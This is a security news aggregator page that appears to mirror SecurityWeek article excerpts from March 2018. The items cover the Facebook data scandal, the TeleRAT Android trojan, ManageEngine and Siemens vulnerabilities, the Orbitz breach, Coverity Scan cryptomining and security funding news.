2018-03-21 18:20:04 | Growing Mistrust Threatens Facebook After Data Mining Scandal (lien direct) | As Facebook reels from the scandal over hijacked personal data, a movement to quit the social network gathered momentum Wednesday, portending threats to one of the most powerful internet firms. In a sign of the mood, one of those calling it quits was a high-profile co-founder of the WhatsApp messaging service acquired by Facebook in 2014 for $19 billion. "It is time. #deletefacebook," Brian Acton said in a tweet, using the hashtag protesting the handling of the crisis by the world's biggest social network. The WhatsApp co-founder, who now works at the rival messaging application Signal, posted the comment amid a growing uproar over revelations that Facebook data was harvested by a British political consulting firm linked to Donald Trump's presidential campaign. "Delete and forget. It's time to care about privacy," he said. The huge social network also faces investigations on both sides of the Atlantic over its data practices, and a handful of lawsuits which could turn into class actions that may prove a costly distraction for Facebook. It remains to be seen whether the uproar would lead to any significant departures, but the topic was active on social media, including on Facebook itself. Donella Cohen, a Weather Channel product manager, posted on her Facebook page that she would be off the network by midnight. "The latest revelations are showing just how corrupt and detrimental to society this particular platform is," she wrote. "I hope that a new social network emerges. One that isn't so greedy as to corrupt the political process in the name of the almighty dollar." - Fabric of internet - Yet analysts noted Facebook is unlikely to fade quickly because of how it is woven into the fabric of the internet, with "like" buttons on websites, comments sections for news articles and an ad network that delivers messages to those who are not Facebook members. The #deleteFacebook movement "is a social media feedback loop from the public -- we saw the same thing with #deleteUber," said Jennifer Grygiel, a communications professor at Syracuse University. "Sure, some people will delete Facebook, but to truly delete Facebook would mean that users would need to delete Facebook, Instagram, WhatsApp, and Messenger. This is not realistic for most people given how social media has been integrated into everyday life." Sandra Proske, head of communications for the Finla | Guideline | Uber | |
|
2018-03-21 16:02:05 | (Déjà vu) Android Trojan Leverages Telegram for Data Exfiltration (lien direct) | A newly discovered Android Trojan is abusing Telegram's Bot API to communicate with the command and control (C&C) server and to exfiltrate data, Palo Alto Networks security researchers warn. Dubbed TeleRAT, the malware appears to be originating from and/or to be targeting individuals in Iran. The threat is similar to the previously observed IRRAT Trojan, which uses Telegram's bot API for C&C communication only. Still active in the wild, IRRAT masquerades as applications supposedly informing users on the number of views their Telegram profile received (something that Telegram doesn't actually allow for). After the app's first launch, the malware creates and populates a series of files on the phone's SD card, which it then sends to an upload server. The files contain contact information, a list of Google accounts registered on the phone, SMS history, a picture taken with the front-facing camera, and a picture taken with back-facing camera. The malicious app reports to a Telegram bot, hides its icon from the phone's app menu, and continues to run in the background, waiting for commands. TeleRAT, on the other hand, creates two files on the device, one containing various device information (including system bootloader version number, available memory, and number of processor cores), and another containing a Telegram channel and a list of commands, Palo Alto Net | Guideline | ||
|
2018-03-21 15:57:00 | Fraud Prevention Firm Sift Science Raises $53 Million (lien direct) | Fraud prevention and risk management solutions provider Sift Science today announced that it has closed a $53 million Series D funding round, bringing the total raised to date by the company to $107 million. The latest funding round was led by New York-based growth equity firm Stripes Group, with participation from SPINS, Remitly, Flatiron Health, Udemy, GrubHub, and previous investors Union Square Ventures, Insight Venture Partners, and Spark Capital. Sift Science plans on using the newly acquired funds to expand its global footprint in the fraud detection and prevention market, which is estimated to reach roughly $42 billion by 2022. Sift's Digital Trust Platform relies on machine learning to protect businesses against fraud and abuse, including payment fraud, fake accounts, account hijacking, and abusive user-generated content. The platform uses data from thousands of websites and apps to identify fraud patterns based on connections between users, behaviors, locations, devices and more. Sift says its customers include Airbnb, Twitter, Twilio, Shutterstock, Yelp, Wayfair and Jet. “We believe Sift is uniquely positioned to leverage its best-in-class software platform and data network to fundamentally reshape the way businesses and consumers interact online – with more confidence, transparency and security. We are thrilled to be partnering with Sift as it accelerates its already exceptional growth trajectory,” said Ron Shah, partner at Stripes Group. Related: Virsec Raises $24 Million in Series B Funding Related: ThreatQuotient Raises $30 Million in Series C Funding Related: RELX Group to Acquire Fraud Fighting Firm ThreatMetrix for $815 Million No active ads were found in t47 --> (function() { var po = document.createElement("script"); po.type = "text/javascript"; po.async = true; po.src = "https://apis.google.com/js/plusone.js"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(po, s); | |||
|
2018-03-21 15:41:04 | Webinar Today - Reducing Privileges Reduces Risk: Using the Least Privilege Model (lien direct) | Reducing Privileges Reduces Risk: Using the Least Privilege Model
Live Webinar - March 21, 2018 at 1PM ET
Have you been exploring ways to implement a least privilege strategy to lower your risk of malware-based attack? Are you struggling to meet security compliance requirements, trying to lock down and remove unneeded and unmanaged privileged accounts? Worried that removing local admin privileges from users will backfire if they can't access the applications and tools they need?
Removing local admin rights, including hidden and hard-coded credentials, mitigates virtually all critical vulnerabilities on Windows and Mac endpoints. But it's not enough to ensure your organization stays productive. Policy-based application control ensures business users can still access and manage the applications they need to do their job.
Please join SecurityWeek and Thycotic for this webinar learn the most effective way to discover, manage, secure and enforce local admin accounts.
Register Now
|
|||
|
2018-03-21 15:02:04 | (Déjà vu) Code Execution Flaws Found in ManageEngine Products (lien direct) | Researchers at cybersecurity technology and services provider Digital Defense have identified another round of vulnerabilities affecting products from Zoho-owned ManageEngine. ManageEngine provides network, data center, desktop, mobile device, and security solutions to more than 40,000 customers, including three out of every five Fortune 500 company. Earlier this year, Digital Defense reported finding several potentially serious flaws in ManageEngine's ServiceDesk Plus help desk software, and on Wednesday the company disclosed the details of six additional security holes found by its researchers in ManageEngine Log360, EventLog Analyzer, and Applications Manager products. The vulnerabilities have been described by Digital Defense as file upload, blind SQL injection, local file inclusion, and API key disclosure issues that can be exploited without authentication for arbitrary code execution and obtaining potentially sensitive information. According to the security firm, the Log360 and EventLog Analyzer log management products are affected by an unauthenticated file upload vulnerability that can be exploited to upload a JavaServer Pages (JSP) web shell to the root directory. This is possible due to the fact that a file upload feature's security checks can be easily bypassed. The rest of the flaws discovered by Digital Defense researchers impact ManageEngine Applications Manager and many of them can be exploited for arbitrary code execution. Experts have identified several blind SQL injection flaws that can be leveraged by unauthenticated attackers to execute arbitrary code with SYSTEM privileges and gain complete control of the targeted host. The list of security holes also includes a local file inclusion issue that can be exploited to download files that may contain sensitive information. Researchers also discovered that an attacker can obtain an Applications Manager user's API key by sending a specially crafted GET request. “Depending on the privilege level of the compromised user, this could result in full compromise of both the Applications Manager web application and the host running it,” Digital Defense warned. The vulnerabilities were reported to ManageEngine on February 12 and fixes were developed a few weeks later. Patches were made available to customers on March 7. Related: Serious Flaws Affect Dell EMC, VMware Data Protection Products Re | |||
|
2018-03-21 14:52:00 | 18.5 Million Websites Infected With Malware at Any Time (lien direct) | There are more than 1.86 billion websites on the internet. Around 1% of these -- something like 18,500,000 -- are infected with malware at a given time each week; while the average website is attacked 44 times every day. Sitelock has published its Q4 2017 Website Security Insider analysis of malware and websites based on statistics from 6 million of its 12 million customers. All these customers use at least one of Sitelock's malware scanners, while a smaller subset also use the firm's cloud-based web application firewall (WAF). The WAF provides insight into DDoS attacks against websites, while the sca≈nners provide insight to the state of malware in websites. The analysis shows an increase of around 20% in the number of infected websites over Q3 2017. "We went from about 0.8% of our user base in Q3 to a little over 1% in Q4," Sitelock research analyst Jessica Ortega told SecurityWeek. A 0.2% increase seems a small number, but it implies that up to 18.5 million websites worldwide may be infected with malware at any given time. Despite the increase in infected sites, continued Ortega, "The total number of attacks or attempted attacks actually decreased by about 20% -- so what we're seeing is that it takes fewer attack attempts to compromise the websites. Attackers are becoming sneakier, and more difficult-to-decode malware is coming through." The majority of Sitelock's customers are typically small businesses and blogs. "Many website owners remain unaware that website security is their responsibility and rely too heavily on popular search engines and other third parties to notify them when they've been compromised," said Ortega. This doesn't work -- less than 1 in 5 infected websites are blacklisted by the search engines. Other owners rely on their CMS software provider to keep them secure with security updates. But according to Sitelock, 46% of WordPress sites infected with malware were up to date with the latest core updates. Those also using plug-ins were twice as likely to be compromised. It is the sheer volume of both threats and compromises that is most surprising. During Q4 2017, Sitelock cleaned an average of 672,655 malicious files every week. It found an average of 309 infected files per site. Sixteen percent of malware results in site defacements, while more than 12% are backdoors facilitating the upload of thousands of other malicious files including exploit kits and phishing pages. Jessica Ortega, research analyst at Sitelock, comments that the malicious files are often stored on websites in zip files. Even if active files are removed, the site can be compromised again, and the zip file extracted for the attacker to continue precisely as before. One of the problems is that the average website is very easy to compromise. Sitelock's analysis in Q4 found an average of 414 pages per site containing cross-site scripting (XSS) vulnerabilities; 959 pages per site containing SQL injection (SQLi) vulnerabilities; and 414 pages per site containing cross-site request forgery (CSRF) vulnerabilities. | |||
|
2018-03-21 12:33:01 | Siemens Patches Flaws in SIMATIC Controllers, Mobile Apps (lien direct) | German industrial giant Siemens has released security patches for several of its SIMATIC products, including some controllers and a mobile application. Organizations using SIMATIC products were informed by both Siemens and ICS-CERT this week of a denial-of-service (DoS) vulnerability that can be exploited by sending specially crafted PROFINET DCP packets to affected systems. The flaw, tracked as CVE-2018-4843 and classified as medium severity, can be exploited by an attacker who has access to the network housing the targeted device. While DoS vulnerabilities are generally seen as less severe compared to code execution and other types of flaws, in the case of industrial control systems (ICS), they can have serious impact. The security hole affects several SIMATIC central processing units (CPUs) and software controllers, SINUMERIK CNC automation solutions, and Softnet PROFINET IO controllers. Siemens has released patches for some of the impacted systems, and provided workarounds and mitigations for the rest. Learn More at SecurityWeek's ICS Cyber Security Conference Siemens also informed customers on Tuesday of an access control vulnerability affecting the Android and iOS versions of its SIMATIC WinCC OA UI mobile application. This app is designed to allow users to remotely access WinCC OA facilities from their mobile devices. “The latest update for the Android app and iOS app SIMATIC WinCC OA UI fix a security vulnerability which could allow read and write access from one HMI project cache folder to other HMI project cache folders within the app's sandbox on the same mobile device,” Siemens wrote in its advisory. “This includes HMI project cache folders of other configured WinCC OA servers. Precondition for this scenario is that an attacker tricks an app user to connect to an attacker-controlled WinCC OA server,” it added. The SIMATIC WinCC OA UI application vulnerability was discovered by experts at IOActive and Embedi as part of their research into SCADA mobile apps. They analyzed applications from 34 vendors and found security holes in a vast majority of them. Related: Schneider Electric Patches Several Flaws in IGSS Products Related: Siemens Releases BIO | |||
|
2018-03-21 11:29:00 | (Déjà vu) 5 Fun Facts About the 2018 Singapore Cybersecurity Statute (lien direct) | An orchard of cybersecurity law is growing in Asia. Now based in Singapore, your intrepid reporter is bumping into these cyber laws not as a participant (yet) but as an interested observer. Like the data-protection laws recently passed throughout the region, these cybersecurity regulations have a lot in common with each other. Singaporeans are known for their discipline, so you can expect that their cybersecurity law will be among the best in the region. Let your intrepid reporter summarize the statute, and also highlight 5 fun facts found within it. The Singapore Cybersecurity Statute On January 8, 2018, the Singapore government published Bill No. 2/2018, referred to as “the Cybersecurity Bill.” Local infosec professionals consider it, overall, a good bill, covering exactly the topics one would expect to see from the Singaporean government. After a first draft, lively debate ensued during the public commentary period, and the government folded the best suggestions into its final bill. The administration of the statute will be completed by a Cybersecurity Commissioner. This person will define many of the finer points of policy, which have been purposely left out of the framework. The bill comprises three main themes: 1. Critical Infrastructure. The Cybersecurity Bill defines the criteria by which the commissioner should identify critical infrastructure (sections 7–9). These include 11 groupings of “essential services,” including aviation, banking, and healthcare. Fun Fact #1: The Philippine government is working on a similar project, called the “National Cybersecurity Plan 2022”, and word is that they copied the groupings, in order, from the Singaporean version. Nothing wrong with that, though. The local cybersecurity community applauds the Singapore bill's requirements for bi-annual audits and regular penetration tests. That's just good policy, so it might as well be a law; after all, this is Singapore. 2. Incident Response. Sections 19–23 define the powers the commissioner has to investigate, prevent, and respond to cybersecurity incidents. Fun Fact #2: Of interest is that the bill allows the designation of temporary technical experts, who will be issued cards identifying themselves as such. Your reporter personally finds this pretty cool, and would be tickled to be a card-carrying Singaporean crime fighter (temporarily) someday. He imagines himself holding up a badge and saying, with authority, “Everyone calm down, I'm here to help.” 3. Cybersecurity Service Providers. Sections 24–35 describe the governance of so-called cybersecurity service providers-penetration testers and security operations centers (SOCs). Perhaps the most significant aspect of the bill is Fun Fact #3: Provid | Cloud | APT 37 | |
|
2018-03-21 07:22:02 | (Déjà vu) \'Slingshot\' Is U.S. Government Operation Targeting Terrorists: Report (lien direct) | The Slingshot cyber espionage campaign exposed recently by Kaspersky Lab is a U.S. government operation targeting members of terrorist organizations, according to a media report. Earlier this month, Kaspersky published a report detailing the activities of a threat actor targeting entities in the Middle East and Africa - sometimes by hacking into their Mikrotik routers. The group is believed to have been active since at least 2012 and its members appear to speak English, the security firm said. The main piece of malware used by the group has been dubbed Slingshot based on internal strings found by researchers. Kaspersky identified roughly 100 individuals and organizations targeted with the Slingshot malware, mainly in Kenya and Yemen, but also in Afghanistan, Libya, Congo, Jordan, Turkey, Iraq, Sudan, Somalia and Tanzania. CyberScoop claims to have learned from unnamed current and former U.S. intelligence officials that Slingshot is actually an operation of the U.S. military's Joint Special Operations Command (JSOC), a component of Special Operations Command (SOCOM), aimed at members of terrorist organizations such as ISIS and al-Qaeda. SOCOM is well known for its counterterrorism operations, which can sometimes include a cyber component. CyberScoop's sources expressed concern that the exposure of the campaign may result in the U.S. losing a valuable surveillance program and it could even put the lives of soldiers at risk. The Slingshot infrastructure was likely already abandoned and “burned” following the disclosure, one former intelligence official told the publication. Kaspersky has always insisted that its role is to protect customers against cyber threats, regardless of the source of an attack. The company typically refrains from attributing attacks, but it has exposed operations believed to be linked to Russia, China, the United States and others. In the case of Slingshot, Kaspersky has not directly attributed the campaign to the United States, but it did note that the hackers appear to speak English. The company also pointed out that some of the techniques used by this actor are similar to ones leveraged by a group known as Longhorn and The Lamberts, which is believed to be associated with the U.S. Central Intelligence Agency (CIA). It's also worth noting that the WikiLeaks Vault7 files, which are believed to be tools developed and used by the CIA, describe a Mikrotik router exploit, although it is unclear if it's the one used in Slingshot attacks. Another clue that shows a potential connection between Slingshot and U.S. intelligence is the use of tools and code strings referencing “Lord of the Rings” characters, including Gollum, which is also the name of an implant referenced in NSA documents | |||
|
2018-03-21 02:30:00 | U.S. Military Should Step Up Cyber Ops: General (lien direct) | Washington - US efforts to conduct offensive and defensive operations in cyberspace are falling short, a top general warned Tuesday amid ongoing revelations about Russian hacking. General John Hyten, who leads US Strategic Command (STRATCOM), told lawmakers the US has "not gone nearly far enough" in the cyber domain, also noting that the military still lacks clear rules of cyber engagement. "We have to go much further in treating cyberspace as an operational domain," Hyten told the Senate Armed Services Committee. "Cyberspace needs to be looked at as a warfighting domain, and if somebody threatens us in cyberspace we need to have the authorities to respond." Hyten noted, however, that the US had made some progress in conducting cyber attacks on enemies in the Middle East, such as the Islamic State group. His testimony comes weeks after General Curtis Scaparrotti, commander of NATO forces in Europe, warned that US government agencies are not coordinating efforts to counter the cyber threat from Russia, even as Moscow conducts a "campaign of destabilization." And last month, Admiral Michael Rogers, who heads both the NSA -- the leading US electronic eavesdropping agency -- and the new US Cyber Command, said President Donald Trump had not yet ordered his spy chiefs to retaliate against Russian interference in US elections. The US has accused Russia of actively interfering in the 2016 presidential election, stealing Democratic party communications and pushing out disinformation through social media. It also accuses Moscow of stealing hacking secrets of the US intelligence community -- while US cyber security investigators have accused the Russian government of a sustained effort to take control of critical US infrastructure systems including the energy grid. Hyten added the military needs clear authorities and rules of engagement so operators know when and how to respond to attacks. "We need to have specific rules of engagement in cyber that match the other domains that we operate in," Hyten said. "We need to delegate that authority all the way down so we can deal with threats that exist that challenge the United States." | Guideline | ||
|
2018-03-21 01:24:01 | (Déjà vu) AMD Says Patches Coming Soon for Chip Vulnerabilities (lien direct) | AMD Chip Vulnerabilities to be Addressed Through BIOS Updates - No Performance Impact Expected
After investigating recent claims from a security firm that its processors are affected by more than a dozen serious vulnerabilities, chipmaker Advanced Micro Devices (AMD) on Tuesday said patches are coming to address several security flaws in its chips.
In its first public update after the surprise disclosure of the vulnerabilities by Israeli-based security firm CTS Labs, AMD said the issues are associated with the firmware managing the embedded security control processor in some of its products (AMD Secure Processor) and the chipset used in some socket AM4 and socket TR4 desktop platforms supporting AMD processors.
CTS Labs, which was unheard of until last week, came under fire shortly after its disclosure for giving AMD only a 24-hour notice before going public with its findings, and for apparently attempting to short AMD stock. The company later made some clarifications regarding the flaws and its disclosure method.
CTS Labs claimed that a number of vulnerabilities could be exploited for arbitrary code execution, bypassing security features, stealing data, helping malware become resilient against security products, and damaging hardware.
“AMD has rapidly completed its assessment and is in the process of developing and staging the deployment of mitigations,” the chipmaker wrote in an update on Tuesday. “It's important to note that all the issues raised in the research require administrative access to the system, a type of access that effectively grants the user unrestricted access to the system and the right to delete, create or modify any of the folders or files on the computer, as well as change any settings.”
AMD said that patches will be released through BIOS updates to address the flaws, which have been dubbed MASTERKEY, RYZENFALL, FALLOUT and CHIMERA. The company said that no performance impact is expected for any of the forthcoming mitigations.
AMD attempte |
Guideline | Equifax | |
|
2018-03-20 20:26:04 | Virsec Raises $24 Million in Series B Funding (lien direct) | Virsec, a cybersecurity company that protects applications from various attacks, today announced that it has closed a $24 million Series B funding round led by tech investment firm BlueIO.
This latest funding round brings the total amount raised to-date by the company to $32 million. The company previously raised $1 million in seed funding and $7 million in a Series A funding round.
Virsec explains that its technology can protect applications by protecting processes in memory and pinpointing attacks in real-time, within any application. In more detail, the company explains that its Trusted Execution technology “maps acceptable application execution, and instantly detects deviations caused by attacks.”
“The battleground has shifted in cybersecurity and the industry is not keeping up,” said Atiq Raza, CEO of San Jose, California-based Virsec. “With our deep understanding of process memory, control flow, and application context, we have developed a revolutionary solution that stops attacks in their tracks, where businesses are most vulnerable – within applications and processes.”
Additional investors participating in the round include Artiman Ventures, Amity Ventures, Raj Singh, and Boston Seed Capital.
|
Guideline | Equifax | |
|
2018-03-20 18:27:03 | Online Sandbox Services Used to Exfiltrate Data: Researcher (lien direct) | Attackers can use online sandbox services to exfiltrate data from an isolated network, a SafeBreach security researcher has discovered. The new research is based on the discovery that cloud anti-virus programs can be exploited for data pilfering. Last year, SafeBreach Labs' Itzik Kotler and Amit Klein demonstrated proof-of-concept (PoC) malware abusing this exfiltration method, and said it would work even on endpoints that have no direct Internet connection. The technique, the researchers revealed, relied on packing data inside an executable created by the main malware process on the compromised endpoint. Thus, if the anti-virus program on the endpoint uploads the executable to the cloud for further inspection, data is exfiltrated even if the file is executed in an Internet connected sandbox. Now, SafeBreach security researcher Dor Azouri says that online sandbox services can be used for the same purposes and in similar circumstances. However, the researcher notes in a report (PDF | |||
|
2018-03-20 17:20:00 | Orbitz Data Breach Impacts 880,000 Payment Cards (lien direct) | Expedia-owned travel website Orbitz announced on Tuesday that it has discovered and addressed a data security incident affecting hundreds of thousands of users. In a statement provided to SecurityWeek and other news websites, Orbitz revealed that malicious actors apparently gained access to a legacy platform between October 1 and December 22, 2017. The attackers may have stolen personal and financial data from this platform, which stored both consumer and business partner information. The breach was discovered on March 1 following an investigation conducted by Orbitz. The company said in contracted forensic investigation and other cybersecurity experts to help it analyze the incident and eliminate vulnerabilities. Law enforcement has also been notified. Orbitz has highlighted that the hackers targeted a legacy platform and there is no evidence that the current Orbitz.com website is affected. The investigation showed that the attackers may have accessed personal information submitted by consumers who made certain purchases between January 1 and June 22, 2016. Information on Orbitz partners who made purchases between January 1, 2016 and December 22, 2017 may have also been stolen. The exposed information includes full name, gender, date of birth, phone number, email address, physical and billing address, and payment card data. The company said the breach impacted roughly 880,000 payment cards. There is no evidence that passport and travel itinerary information has been compromised, and Orbitz does not store social security numbers (SSNs) for customers in the United States. “We are working quickly to notify impacted customers and partners. We are offering affected individuals one year of complimentary credit monitoring and identity protection service in countries where available. Additionally, we are providing partners with complimentary customer notice support for partners to inform their customers, if necessary,” Orbitz stated. “Anyone who is notified is encouraged to carefully review and monitor their payment card account statements and contact their financial institution or call the number on the back of their card if they suspect that their payment card may have been misused,” the company added. Potentially impacted customers can obtain more information by calling 1-855-828-3959 (toll-free in the U.S.) or 1-512-201-2214 (international), or by visiting orbitz.allclearid.com. Orbitz.com is used by millions of people to search for and book hotels, flights, cruises, cars and other vacation-related activities. The company was acquired by Expedia in 2015 for $1.6 billion. Related: Travel | |||
|
2018-03-20 16:06:00 | The Security Spending Paradox (lien direct) | A Zero Trust Security Model Allows Organizations to Align Their Security Investments With What Works Best In a few weeks, security professionals from all around the world will descend on San Francisco for RSA Conference 2018 to discuss new approaches to information security and how to prevent being victimized by cyber-attacks. As always, the expo halls will be filled with the latest technologies, ranging from Artificial Intelligence, Container Security, Threat Intelligence, and Threat Hunting to Next-Gen Endpoint Security. But are these emerging technologies providing the effectiveness that is needed to defend against today's dynamic cyber threats? According to Gartner, worldwide security spending will reach $96 billion in 2018, up 8% from the 2017 spend of $89 billion. This statistic confirms that organization are incorporating emerging technologies in their existing security stack to minimize their cyber risk exposure. Meanwhile we're experiencing a continuous increase in security incidents. Are these security investments paying dividends? The security spending paradox is reflected in several recent research studies. For example, a Dow Jones Customer Intelligence study finds that 62 percent of CEOs believe malware is the biggest threat to their organization. In another report, the 2018 Scalar Security Study, respondents rate Network Security (61%) or Traditional Endpoint Protection (49%) of higher (perceived) effectiveness than identity assurance and access controls (18%). Similar results were published by 451 Research in the 2018 Thales Data Threat Report, where network security (83%) and endpoint security (70%) scored highest in perceived effectiveness. These incongruent findings illustrate a lack of consensus in the industry on which attack vectors pose the biggest risk to organizations and the “identity crisis” in security. Many organizations don't realize the impact that identity and access management has when it comes to minimizing the risk of suffering a data breach. A post-mortem analysis of the top data breaches in 2017, reveals that compromised identity was the primary vector in these cyber-attacks. As a matter of fact, a whopping 81% of hacking-related breaches leverage either stolen, default, or weak passwords. In this context, organizations need to recognize that perimeter-based security, which focuses on securing endpoints and networks, provides no protection against identity and credential-based threats. Until we start implementing identity-centric security measures, account compromise attacks will continue to provide a perfect camouflage for data breaches. | Guideline | ||
|
2018-03-20 15:48:01 | Apple Addresses HSTS User Tracking in WebKit (lien direct) | Apple has added new protections to the WebKit framework to prevent possible abuse of the HTTP Strict Transport Security (HSTS) security standard to track users. HSTS offers a mechanism through which web sites declare themselves accessible only via secure connections and direct browsers to where that secure version resides. Basically, when a user attempts to connect to the insecure version of a website, HSTS forces the browser to go to the HTTPS version of the site instead. “This is a great feature that prevents a simple error from placing users in a dangerous state, such as performing financial transactions over an unauthenticated connection,” WebKit software engineer Brent Fulgham points out. However, because HSTS tells web browsers to remember when redirected to a secure location and to automatically go there in the future, a “super cookie” can be created, and it can be read by cross-site trackers, Fulgham says. An attacker could leverage the user's HSTS cache to store one bit of information on the device. Through registering a lar | |||
|
2018-03-20 14:58:04 | (Déjà vu) XM Cyber Unveils Automated Purple-Teaming at Speed and Scale (lien direct) | Israeli Cybersecurity Startup Launches Automated Advanced Persistent Threat (APT) Simulation Platform Penetration testing is the most effective method of testing whether existing security policy stands up against advanced attackers, but it doesn't scale well to large, dynamic networks, and only provides a single conclusion at a specific point in time. The solution is clearly automation. XM Cyber is an Israeli firm founded in 2016. Its three co-founders are Tamir Pardo (formerly head of Mossad); Boaz Gorodissky (formerly head of technology for the government of Israel); and Noam Erez (who spent 25 years in Israeli intelligence). Its headquarters are in Israel, but with a presence in the U.S. and Australia. It has customers in Israel, the U.S. and Europe. Its primary product, an automated APT simulation platform called HaXM, is unveiled today. The product simulates the possible behavior of an attacker in order to locate potential weaknesses on the system; and then, using the data gathered, provides recommendations for the remediation of those weaknesses. In this manner it provides automated red teaming with blue teaming to produce purple teaming at speed, continuously, and at scale. "The problem we solve," VP of Product Adi Ashkenazy told SecurityWeek, "is that when you look at modern organizations and you see the kind of security stack they have in place, you have to wonder if they are actually securing their critical assets. This is something the companies ask themselves as well. They spend a lot of money on different products and vendors; but at the end of the day, if you ask them, 'are your critical assets secure?', they may have hope and some belief, but they have no concrete evidence to support the idea." Manual penetration testing to prove the hypothesis of security, he continued, makes no sense for the modern organization that may have tens of thousands of endpoints, and hundreds of subsystems; and is continuously evolving and changing. "This is why we founded XM Cyber," commented Noam Erez: "to equip enterprises with a continuous 360-degree view of which critical assets are at risk, what security issues they should focus on, and how best to harness their resources to resolve them." HaXM places sensors only on 'endpoints of interest'. "We don't have to map the entire network," said Ashkenazy. "We deploy our sensors on the endpoints of interest within the infrastructure that hackers are able or likely to use. We try to be almost religious in the way we mimic attacks -- we don't put sensors on every endpoint." | |||
|
2018-03-20 14:06:00 | (Déjà vu) Oil and Gas Sector in Middle East Hit by Serious Security Incidents (lien direct) | Many oil and gas companies in the Middle East reported suffering at least one serious security incident in the past year, according to a study conducted by Ponemon Institute on behalf of German industrial giant Siemens.
Nearly 200 individuals responsible for overseeing cybersecurity risk in oil and gas companies in the Middle East have taken part in the study and the results show that many organizations are unprepared to address the risks faced by their operational technology (OT) networks.
According to Siemens, three-quarters of respondents said their organizations had suffered at least one security incident that resulted in disruption to operations in their OT environment or loss of confidential information in the past 12 months. Eleven percent of respondents said they had experienced more than 10 OT network intrusions, and nearly half believe they may not be aware of all breaches.
Roughly two-thirds of the individuals who took part in the survey believe the risk of attacks on industrial control systems (ICS) has increased considerably over the past few years, and 60 percent say there is a greater risk to OT environments compared to IT.
Outdated and ageing control systems pose a serious risk, according to 42 percent of respondents. The areas most at risk in Middle Eastern oil and gas companies are believed to be exploratory information, production information, potential partners, financial and organizational reports, operational data, information on drilling sites, and field production data collected by sensors.
While insider threats are the main concern, only 21 percent of respondents are concerned about malicious insiders, while 68 percent are more worried about the cybersecurity impact of careless employees.
Learn More at SecurityWeek's ICS Cyber Security Conference
Companies appear aware of the risks, but many of them are not prepared to deal with them. Less than half of respondents say they continually monitor their entire infrastructure, and only a quarter are confident in their ability to address security risks and allocate the resources necessary for addressing them. On average, companies have allocated only a third of their cybersecurity budget to protecting OT environments, the report shows.
Siemens says many organizations are still attempting to air gap their ICS environments in an effort to mitigate threats, but only 39 percent plan on hardening endpoints, and 20 percent plan on adopting analytics solutions over the next year.
|
|||
|
2018-03-20 12:05:00 | Telegram Must Give FSB Encryption Keys: Russian Court (lien direct) | Moscow - Russia's Supreme Court on Tuesday ruled the popular Telegram messenger app must provide the country's security services with encryption keys to read users' messaging data, agencies reported. Media watchdog Roskomnadzor instructed Telegram to "provide the FSB with the necessary information to decode electronic messages received, transmitted, or being sent" within 15 days, it said on its website. Telegram had appealed against an earlier ruling that it must share this information, but this appeal was rejected on Tuesday. If it does not provide the keys it could be blocked in Russia. The free instant messaging app, which lets people exchange messages, photos and videos in groups of up to 5,000 people, has attracted more than 100 million users since its launch in 2013. Telegram's self-exiled Russian founder Pavel Durov said in September 2017 the FSB had demanded backdoor access. When Telegram did not provide the encryption keys, the FSB launched a formal complaint. Durov wrote last year that the FSB's demands are "technically impossible to carry out" and violate the Russian Constitution which entitles citizens to privacy of correspondence. Tuesday's ruling is the latest move in a dispute between Telegram and the Russian authorities as Moscow pushes to increase surveillance of internet activities. Last June, Russia's state communications watchdog threatened to ban the app for failing to provide registration documents. Although Telegram later registered, it stopped short of agreeing to its data storage demands. Companies on the register must provide the FSB with information on user interactions. From this year they must also store all the data of Russian users inside the country, according to controversial anti-terror legislation passed in 2016 which was decried by internet companies and the opposition. Related: Russia Fines Telegram For Not Giving Backdoor Access Related: Zero-Day in Telegram's Windows Client Exploited for Months | |||
|
2018-03-20 07:03:01 | Coverity Scan Hacked, Abused for Cryptocurrency Mining (lien direct) | Coverity Scan, a free service used by tens of thousands of developers to find and fix bugs in their open source projects, was suspended in February after hackers breached some of its servers and abused them for cryptocurrency mining.
Synopsys, which acquired Coverity in 2014, started notifying Coverity Scan users about the breach on Friday. The company said malicious actors gained access to Coverity Scan systems sometime in February.
“We suspect that the access was to utilize our computing power for cryptocurrency mining,” Synopsys told users. “We have not found evidence that database files or artifacts uploaded by the open source community users of the Coverity Scan service were accessed. We retained a well-known computer forensics company to assist us in our investigation.”
Synopsys says the service is now back online and it believes the point of access leveraged by the attackers has been closed. In order to regain access to Coverity Scan, users will need to reset their passwords.
“Please note that the servers in question were not connected to any other Synopsys computer networks. This should have no impact on customers of our commercial products, and this event did not put any Synopsys corporate data or intellectual property at risk,” users were told.
Cybercriminals have become increasingly interested in making a profit by hacking PCs and servers and abusing them to mine cryptocurrencies. Cryptocurrency mining malware can target a wide range of devices, including industrial systems.
One recent high-profile victim was the carmaker Tesla, whose Kubernetes pods were compromised and used for cryptocurrency mining. According to RedLock, which discovered the breach, hackers gained access to Tesla's Kubernetes console due to the lack of password protection.
Related: Avoid Becoming a Crypto-Mining Bot - Where to Look for Mining Malware and How to Respond
Related: Linux Malware Targets Raspberry Pi for Cryptocurrency Mining
|
Uber Tesla | ||
|
2018-03-20 00:34:03 | Facebook Security Chief Changes Role to Focus on Election Fraud (lien direct) | Facebook's chief of security late Monday said his role has shifted to focusing on emerging risks and election security at the global social network, which is under fire for letting its platform be used to spread bogus news and manipulate voters. Alex Stamos revealed the change in his role at work after a New York Times report that he was leaving Facebook in the wake of internal clashes over how to deal with the platform being used to spread misinformation. "Despite the rumors, I'm still fully engaged with my work at Facebook," Stamos said in a message posted at his verified Twitter account. "It's true that my role did change. I'm currently spending more time exploring emerging security risks and working on election security." Stamos advocated investigating and revealing manipulation of news at the social network by Russian entities, to the chagrin of chief operating officer Sheryl Sandberg and other top executives, the Times reported, citing unnamed current and former employees. Stamos reportedly decided in December he was done with Facebook, but remained at the social network as part of a plan to smoothly hand his job off to a successor. Neither Facebook nor Stamos directly commented on how long he intended to remain at the company, referring to his tweet in response to queries. Word from Stamos came as the California-based social media giant faced an onslaught of criticism at home and abroad over revelations that a firm working for Donald Trump's presidential campaign harvested and misused data on 50 million members. Calls for investigations came on both sides of the Atlantic after Facebook responded to the explosive reports of misuse of its data by suspending the account of Cambridge Analytica, a British firm hired by Trump's 2016 campaign. Vera Jourova, the European commissioner for justice, consumers and gender equality, called the revelations "horrifying, if confirmed," and vowed to address concerns in the United States this week. In Britain, parliamentary committee chair Damian Collins said both Cambridge Analytica and Facebook had questions to answer. According to a joint investigation by the Times and Britain's Observer, Cambridge Analytica was able to create psychological profiles on 50 million Facebook users through a personality prediction app downloaded by 270,000 people, but also scooped up data from friends. A Cambridge Analytica statement denied misusing Facebook data for the Trump 